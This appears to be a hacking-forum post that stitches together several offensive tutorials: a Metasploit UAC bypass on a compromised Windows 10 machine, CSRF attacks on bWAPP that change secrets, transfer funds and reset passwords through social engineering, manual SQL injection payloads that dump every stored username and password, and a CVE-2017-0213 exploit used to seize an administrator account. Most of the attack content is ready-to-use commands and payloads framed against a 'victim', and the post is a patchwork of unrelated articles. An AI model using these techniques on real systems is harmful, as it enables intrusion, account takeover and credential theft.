Login

**NINZA** · 05-02-2020, 11:56 AM

0			0

Hello friends! Today we are going to share a new article related to how to bypass window 10 UAC once you have hacked the victim’s system. In Metasploit, a new module has been added to achieve admin access in window 10s.
Attacker: Kali Linux
Target: Windows 10
[Image: 1.png?w=687&ssl=1]

This module will bypass Windows 10 UAC by hijacking a special key in the Registry under the current user hive, and inserting a custom command that will get invoked when the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC flag turned off. This module modifies a registry key, but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.
use exploit/windows/local/bypassuac_fodhelper
msf exploit(bypassuac_fodhelper) >set session 1
msf exploit(bypassuac_fodhelper) >exploit
1
2
3
use exploit/windows/local/bypassuac_fodhelper
msf exploit(bypassuac_fodhelper) >set session 1
msf exploit(bypassuac_fodhelper) >exploit
Hence you can see another meterpreter session 2 opened which means we successfully exploited the target once again now let’s check user privilege.
meterpreter > getsystem
1
meterpreter > getsystem
Awesome!!!! We got admin privilege successfully.
[Image: 2.png?w=687&ssl=1]

Today we will see CSRF attack in a different scenario like transferring fund and password changing but before we see how cross-site request forgery works we need to understand of few concepts.
Tabbed browsing: Tabbed browsing is an attribute of the Web browsers which allow the users to view multiple websites on a single window instead of opening a new browser window. These extra web pages are represented by tabs at the top of the browser window.
Imagine that you are logged into the Facebook server and visit a malicious website in the same browser, although on a different tab. In absence of the same origin policy (SOP), an attacker can go through your profile and other sensitive information with the help of JavaScript. For example, read private messages, send a fake message, read your chats.
SOP: The same-origin policy is an important concept in the web application security model. Under the policy, a web browser permits scripts contained in a first web page to access data in a second web page, but only if both web pages have the same origin.
XHR: XML Http Request is an API in the form of an object whose methods transfer data between a web browser and a web server.

Update a web page without reloading the page
Request data from a server – after the page has loaded
Receive data from a server – after the page has loaded
Send data to a server – in the background

CSRF: Cross-site request forgery also known as single-click attack or session traversing, in which a malicious website will throw a request to a web application that the user is already authenticated against from a different website. This way an attacker can access functionality in a targeted web application via the victim’s already authenticated browser.
If the victim is an ordinary user, a successful CSRF attack can force the user to perform state-changing requests like transferring funds, changing their email address, and so forth. If the targeted end-user is the administrator account, this can compromise the entire web application.
In this article, we will test a web application against csrf vulnerability with the help of burpsuite POC
Source

[To see content please register here]

Let’s start!!
For this tutorial, I had used bWAPP the vulnerable web application and create a new user raaz with password 123 for login inside the web server.
[Image: 0.png?w=687&ssl=1]

Now set the security level low then from the list of given vulnerability choose your bug cross-site request forgery (change secret) and click on the hack.
[Image: 1.png?w=687&ssl=1]

If you have noticed the first image for creating a new user in that the user “raaz” has set his secret value as 123 now if the user raaz wish to change the secret value for his password he can change it from here.
Now let’s check out how we can test this functionality against CSRF attack and force raaz to change his secret value from the attacker’s desired value that is set a new secret value without his (user) knowledge.
Start the burp suite to capture the sent request between the browser and web application.
[Image: 2.png?w=687&ssl=1]

Form given screenshot you can see we have successfully captured the request inside burp suite nowhere once you have received intercepted data then go towards ACTION tab select engagement tools and at last choose Generate CSRF PoC.
[Image: 3.png?w=687&ssl=1]

CSRF PoC generator will automatically generate an HTML form page which you can see in given below screenshot, Click on copy HTML tag and open a text document to past the copied data.
[Image: 4.1.png?w=687&ssl=1]

Once you have pasted the html code now add your (attacker) secret value “1234” Moreover you need to add user name “raaz” for whom the secret value will get changed, now save the text document as csrf1.html and then use social engineering technique for sharing csrf1.html file to the targeted user.
[Image: 4.png?w=687&ssl=1]

When victim will open Csrf1.html file, here he will found a submit button now as he will click on submit button the secret value for target location will get changed without his (victim) knowledge.
[Image: 5.png?w=687&ssl=1]

Here you observe the result form given below screenshot. Hence in this way, CSRF attack changes the old secret value for password set by user “raaz”.
[Image: 6.png?w=687&ssl=1]

In the next scenario, we are going to test a CSRF attack while transfer amount from users accounts. You might be well aware from such scenario when phone operator let say Airtel transfer an amount (Rs 500) in order to recharge customer phone and user receive the message of the transaction and another example is related bank amount transfer from one user’s account to another user’s account.
In order to learn csrf attack in this situation again login in bWAPP then choose your next vulnerability cross-site request forgery (transfer Amount) and click on the hack.
[Image: 7.png?w=687&ssl=1]

In the given screenshot you can see user have only 1000 EUR in his account it means above this amount the transaction is not possible for both (user as well as for attacker). Further, it is showing the user’s account number to transfer an amount to be transferred.
The procedure for csrf attack is similar as above use burp suite to capture the sent request of the browser.
[Image: 8.png?w=687&ssl=1]

Form given screenshot you can see we have successfully captured the request inside burp suite nowhere once you have received intercepted data then go towards ACTION tab select engagement tools and at last choose Generate CSRF PoC.
[Image: 10.png?w=687&ssl=1]

Again it will create html form automatically for intercepted data now click on copy html tag given at below to copy the generated html code for the form.
[Image: 11.png?w=687&ssl=1]

Open a text document to past the copied data, Once you have pasted the html code now add your (attacker) amount “100” to be transferred, now save the text document as csrf2.html and then use social engineering technique for sharing csrf2.html file to the targeted user.
[Image: 12.png?w=687&ssl=1]

When victim will open Csrf2.html file, here he will found a submit button now as he will click on submit button given amount will be transferred without his (victim) knowledge.
[Image: 13.png?w=687&ssl=1]

From the given screenshot result you see now the amount is left 900 EUR in user’s account which means 100 EUR has been deducted from his account. Hence again we saw the effect of CSRF attack while amount transaction from once accounts to another.
[Image: 14.png?w=687&ssl=1]

At last, we are going to learn the most impactful CRSF attack for changing the password of a user account without his knowledge. Again we will login into bwapp and choose the bug “cross-site request forgery (change password)” to test the csrf vulnerability.
[Image: a.png?w=687&ssl=1]

Here you can clearly saw two text field, one for new password another for confirm password again we will repeat the process using burp suite to catch the request of the browser.
[Image: b.png?w=687&ssl=1]

From is given screenshot you can see we have successfully captured the request inside burp suite nowhere once you have received intercepted data then go towards ACTION tab select engagement tools and at last choose Generate CSRF PoC.
[Image: d.png?w=687&ssl=1]

Once again it has generated the html code for changing the password, hence you can see burp suite itself generate related html form for destination website, and this is an advantage which saves attacker’s time for generating CSRF html form. Again click on copy html tab to copy the code.
[Image: e.png?w=687&ssl=1]

Open a text document to past the copied data, Once you have pasted the html code now add your (attacker)new password value and confirm password value, now save the text document as csrf3.html and then use social engineering technique for sharing csrf3.html file to the targeted user.
If you remember the old password was “123” for user “raaz” and from the screenshot you can perceive that now new password is raj.
[Image: f.png?w=687&ssl=1]

When victim will open Csrf3.html file, here he will found a submit button now as he will click on submit button the password will reset for his account without his (victim) knowledge.
[Image: g.png?w=687&ssl=1]

Hence you can verify it through given below image where it has clearly given the message that “password has been changed”
So today you have seen how we had made csrf attack on a web application server in a different scenario with help of burp suite POC
Try it yourself!!
[Image: h.png?w=687&ssl=1]

In our previous article we had performed Form Based SQL injection using sqlmap but today we are going to perform Form Based SQL injection in DHAKKAN manually. There are so many examples related to login form like Facebook login; Gmail login; other online accounts which may ask you to submit your information like username and password.
Let’s start!!
LESSON 11
This lesson is much similar to lesson 1,2,3,4 if you not familiar with these lessons then please go through it from

[To see content please register here]

. You will come to know how to perform SQL Injection manually step by step in order to retrieve the data from inside the database system.
Lesson 11 is regarding POST error based single quotes (‘) string so when you will explore this lab on the browser you will observe that it contains a text field for username and password to login inside web server. As we are not a true user so we don’t know the correct username and password but being hacker we always wish to get inside the database with help of SQL injection. Therefore first we will test whether the database is vulnerable to SQL injection or not.
Since lesson itself sound like an error based single quotes (‘) string, thus I had used single quotes (‘) to break the query inside the text field of username then click on submit.
Username: ’
From the given screenshot you can see we have got an error message (in blue color) which means the database is vulnerable to SQL injection.
[Image: 1.png?w=687&ssl=1]

So we when breaking the query we get an error message, now let me explain what this error message says.
The right syntax to use near ”” and password=” LIMIT 0,1’
[Image: 2.1.png?w=687&ssl=1]

Now we need to fix this query with help of # (hash) comment; so after adding single quotes (‘) add a hash function (#) to make it syntactically correct.
Username: ‘ #
From the screenshot, you can see it has shown login attempted failed though we have successfully fixed the blue color error message.
[Image: 2.png?w=687&ssl=1]

Now whatever statement you will insert in between ‘and # the query will execute successfully with certain result according to it. Now to find out the number of columns used in the backend query we’ll use order by clause
Username: ' order by 1 #
Username: ' order by 2 #
Username: ' order by 3 #
1
2
3
Username: ' order by 1 #
Username: ' order by 2 #
Username: ' order by 3 #
From the screenshot, you can see I received an error at the order by 3 which mean there are only two columns used in the backend query
[Image: 3.png?w=687&ssl=1]

Similarly, insert query for union select in between ‘and # to select both records.
Username:
' union select 1,2 #
1
' union select 1,2 #
From the screenshot, you can see it also shown successfully logged in, now retrieve data from inside it.
[Image: 4.png?w=687&ssl=1]

Next query will fetch database name, it is as similar as in lesson 1 and from the screenshot, you can read the database name “security”
Username:
' union select 1,database() #
1
' union select 1,database() #
[Image: 5.png?w=687&ssl=1]

Through the given below query, we will be able to fetch tables name present inside the database.
Username:
' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
1
' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
From the screenshot you can read the following table names:
T1: emails
T2: referers
T3: uagents
T4: users
[Image: 6.png?w=687&ssl=1]

Now we’ll try to find out column names of users table using the following query
Username: ‘
union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #
1
union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #
Their so many columns but we interested in username and password only.
[Image: 7.png?w=687&ssl=1]

At last, execute the following query to read all username and password inside the table users.
Username:
' union select group_concat(username),group_concat(password) from users #
1
' union select group_concat(username),group_concat(password) from users #
Hence you can see we have not only retrieve single user credential but entire users credential now use them for login.
This is all about single quotes string error based injection in lesson 11.
[Image: 8.png?w=687&ssl=1]

Lesson 12
In some scenario you will try to use single quotes string for test SQL vulnerability or will go extend in order to break the query even after knowing that database is vulnerable but you will be not able to get break the query and receive error message because might the developer had blacklist the single quotes (‘) at the backend query.
Lesson 12 is similar to previous lesson 11 but here you will face failure if you used single quotes for breaking the query since the chapter sound closed to post Error based double quotes string (“). Thus I had used double quotes (“) to break the query inside the text field of username then click on submit.
username: “
From the given screenshot you can see we have got the error message (in blue color) which means the database is vulnerable to SQL injection.
[Image: 9.png?w=687&ssl=1]

So we when breaking the query we get an error message, now let me explain what this error message says.
The right syntax to use near ‘”””) and password=(“”) LIMIT 0,1’
[Image: 10.1.png?w=687&ssl=1]

Now we need to fix this query with help of ) closing parenthesis and # (hash) comments; so after double quotes (“) add ) closing parenthesis hash function (#) to make it syntactically correct.
username: “) #
From the screenshot, you can see it has shown login attempted failed though we have successfully fixed the blue color error message.
[Image: 10.png?w=687&ssl=1]

Now whatever statement you will insert in between ‘) and # the query will execute successfully with certain result according to it. Now to find out the number of columns used in the backend query we’ll use order by clause
username: “) order by 3 #
From the screenshot, you can see I received an error at the order by 3 which means there are only two columns used in the backend query
[Image: 11.png?w=687&ssl=1]

Similarly, insert query for union select in between “)and # to select both records.
Username:
") union select 1,2 #
1
") union select 1,2 #
From the screenshot, you can see it also shown successfully logged in, let’s now retrieve data from inside it.
[Image: 12.png?w=687&ssl=1]

Next query will fetch database name, it is as similar as in lesson 1 and from the screenshot, you can read the database name “security”
Username:
") union select 1,database() #
1
") union select 1,database() #
[Image: 13.png?w=687&ssl=1]

Through the given below query, we will be able to fetch tables name present inside the database.
Username:
") union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
1
") union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
From the screenshot you can read the following table names:
T1: emails
T2: referers
T3: uagents
T4: users
[Image: 14.png?w=687&ssl=1]

Now we’ll try to find out column names of users table using the following query
Username:
") union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #
1
") union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #
Their so many columns but we interested in username and password only.
[Image: 15.png?w=687&ssl=1]

At last, execute the following query to read all username and password inside the table users.
Username:
") union select group_concat(username),group_concat(password) from users #
1
") union select group_concat(username),group_concat(password) from users #
Hence you can see we have not only retrieve single user credential but entire users credential now use them for login.
This is all about double quotes string error based injection in lesson 12.
[Image: 16.png?w=687&ssl=1]

Open command prompt and check windows user account status using “whoami” command.
[Image: 1.png?w=687&ssl=1]

Account name is “joe” and account status is ‘DefaultAccount’ which is a non-administrator account type.
Try changing administrator using the ’net user’ command. You will see an error ‘Access is denied’
[Image: 2.png?w=687&ssl=1]

Now download “CVE-2017-0213_x64” from

[To see content please register here]

and unzip in your PC. Go to the folder and you can find the .exe file, double click on it to run it.
[Image: 3.png?w=687&ssl=1]

The moment you double click on it, it will automatically open a new command prompt with administrator privileges.
[Image: 4.png?w=687&ssl=1]

Use ‘net user’ command to change the administrator account password. Message ‘The command completed successfully’ will appear. You have now successfully changed the administrator accounts password.
[Image: 5.png?w=687&ssl=1]

Login
Username: Password: Lost Password? Remember me
Or Register an account

Announcement : For Purchasing Advertising Contact Us | Jabber : [email protected] | Telegram :- @bhcis

Announcement :

For Purchasing Advertising Contact Us | Jabber : [email protected] | Telegram :- @bhcis